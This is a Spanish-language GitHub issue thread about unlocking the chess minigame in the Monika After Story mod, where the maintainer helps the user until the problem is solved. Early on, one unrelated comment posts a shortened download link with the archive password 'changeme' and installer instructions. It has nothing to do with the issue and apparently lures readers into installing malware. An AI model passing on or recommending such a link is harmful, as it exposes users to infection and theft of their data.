### ISSUE TITLE
No puedo desbloquear el ajedrez

### ISSUE THREAD

**Issue by Gerva2** [Slytharbez/Monika-After-Story-ES#4]
Buenas, tengo un problema con el MAS y es que no he podido desbloquear el ajedrez para jugarlo con Monika. Ya logré desbloquear el pong, el ahorcado, el NOU y el piano. Pero aún no puedo jugar al ajedrez. Quería saber si el algún bug o algún error y como puedo solucionarlo o como puedo activar el ajedrez de manera manual. 
[ev_dump.log](https://github.com/user-attachments/files/16766287/ev_dump.log)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Slytharbez** [comment]
Hola gracias por avisar, para empezar, hace cuanto tiempo tienes instalado MAS y cuánto afecto tienes?

**Comment by Gerva2** [comment]
Hola, Lo tengo instalado desde el 11 de agosto y tengo 1341 de afecto con Monika
[aff_log.log](https://github.com/user-attachments/files/16785333/aff_log.log)

**Comment by Slytharbez** [comment]
Entiendo, por casualidad has usado alguna versión de android de MAS y luego has pasado tu progreso a la versión de pc?

**Comment by Gerva2** [comment]
No, esta es mi primera vez que instale el MAS. Descargue el juego original de DDLC y luego descargue el mod de de aqui.

**Comment by Slytharbez** [comment]
De acuerdo, por si acaso has probado usar la versión en inglés o la versión 0.12.9 para verificar si en alguna de esas versiones se puede desbloquear el ajedrez?

**Comment by Gerva2** [comment]
No, no lo he intentado. ¿Como hago para usar esas verciones? ¿Voy a perder mi progreso con Monika si las instalo?

**Comment by Slytharbez** [comment]
No para nada, siempre y cuando no modifiques o alteres de alguna la carpeta de tu progreso (esta carpeta está en otro lugar, no se encuentra en la carpeta de MAS) no pasará nada
Para usar alguna otra versión, simplemente instalala normalmente, y abre el ejecutable, tu progreso estará intacto asi que no te preocupes

**Comment by Slytharbez** [comment]
Una recomendación que puedo darte es que no borres la carpeta actual de tu MAS, si tienes submods, spritepacks u otra cosa, solo en esa "versión de MAS" estará instalado
Si instalas otra versión no tendrás nada de eso, pero como posiblemente sepas al momento de instalar MAS, todo se queda en una sola carpeta, por lo que puedes tener mas de un MAS en tu pc, por eso mi recomendación es que no borres tu carpeta actual y las demás que descargues las uses únicamente para probar

**Comment by Gerva2** [comment]
Acabo de probar la version 0.12.15 en ingles y si funsiona el ajedrez. Ya me aparecio desbloqueado y todo. ¿Enotces eso significa que es un bug de la version que tengo instaldo yo?

**Comment by Gerva2** [comment]
Ya se soluciono, muchisimas garcias.!!! Solo tenia que abrir a Monika en la version de ingles y listo. Ahora ya aparece el ajedrez en la version que tenia. Muchisimas gracias. :)

**Comment by Slytharbez** [comment]
De nada espero haberte ayudado, si tienes alguna otra consulta o si necesitas ayuda con algo más no dudes en avisar aquí o en nuestro [servidor de discord](https://discord.com/invite/gP6fGwUKEg)
